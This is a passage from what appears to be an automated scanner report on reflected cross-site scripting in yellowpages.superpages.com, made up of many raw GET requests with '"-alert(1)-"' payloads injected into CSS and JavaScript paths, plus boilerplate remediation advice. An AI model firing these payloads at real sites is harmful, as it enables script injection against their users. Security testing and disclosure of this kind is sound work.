GET /busprofile46554"-alert(1)-"be25698ff9/css/print.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6866"-alert(1)-"0f304c70d9e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/cssb6866"-alert(1)-"0f304c70d9e/print.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff3b0"-alert(1)-"0f9464b5bb7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/css/print.cssff3b0"-alert(1)-"0f9464b5bb7 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49cd4"-alert(1)-"96eceb6ffe4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile49cd4"-alert(1)-"96eceb6ffe4/js/busprofile.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b019f"-alert(1)-"5e23dbe0df5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/jsb019f"-alert(1)-"5e23dbe0df5/busprofile.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af28c"-alert(1)-"d5cdefab79b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/js/busprofile.jsaf28c"-alert(1)-"d5cdefab79b HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload edb86"-alert(1)-"af2b6080645 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofileedb86"-alert(1)-"af2b6080645/js/csiframe.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1bae2"-alert(1)-"d1c4fd37467 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/js1bae2"-alert(1)-"d1c4fd37467/csiframe.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1dd87"-alert(1)-"26871eafe34 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/js/csiframe.js1dd87"-alert(1)-"26871eafe34 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3c75"-alert(1)-"933c529b5ba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofileb3c75"-alert(1)-"933c529b5ba/js/hide.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de57b"-alert(1)-"653154b748 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/jsde57b"-alert(1)-"653154b748/hide.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30f72"-alert(1)-"1d6df26e138 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/js/hide.js30f72"-alert(1)-"1d6df26e138 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41f5f"-alert(1)-"a4339366c19 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile41f5f"-alert(1)-"a4339366c19/js/photos.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9bda1"-alert(1)-"1e48a19052d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/js9bda1"-alert(1)-"1e48a19052d/photos.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92aa7"-alert(1)-"ad045aaf68e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/js/photos.js92aa7"-alert(1)-"ad045aaf68e HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50c0b"-alert(1)-"1189d0fb19e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile50c0b"-alert(1)-"1189d0fb19e/script.more.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 696df"-alert(1)-"ae58cd1d73c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/script.more.js696df"-alert(1)-"ae58cd1d73c HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27e37"-alert(1)-"a77217be230 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common27e37"-alert(1)-"a77217be230/css/forms.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7342"-alert(1)-"107199becab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/cssf7342"-alert(1)-"107199becab/forms.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1c09"-alert(1)-"6f31add0046 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/forms.cssf1c09"-alert(1)-"6f31add0046 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3fdca"-alert(1)-"96068b15aaf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common3fdca"-alert(1)-"96068b15aaf/css/print.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef7bf"-alert(1)-"eed6ae6e6f1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/cssef7bf"-alert(1)-"eed6ae6e6f1/print.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a006a"-alert(1)-"cbff4859ae5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/print.cssa006a"-alert(1)-"cbff4859ae5 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da1ff"-alert(1)-"dc2efa902dc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commonda1ff"-alert(1)-"dc2efa902dc/css/reset.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95a34"-alert(1)-"686e302e816 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css95a34"-alert(1)-"686e302e816/reset.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3aabb"-alert(1)-"23c3bf4d12 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
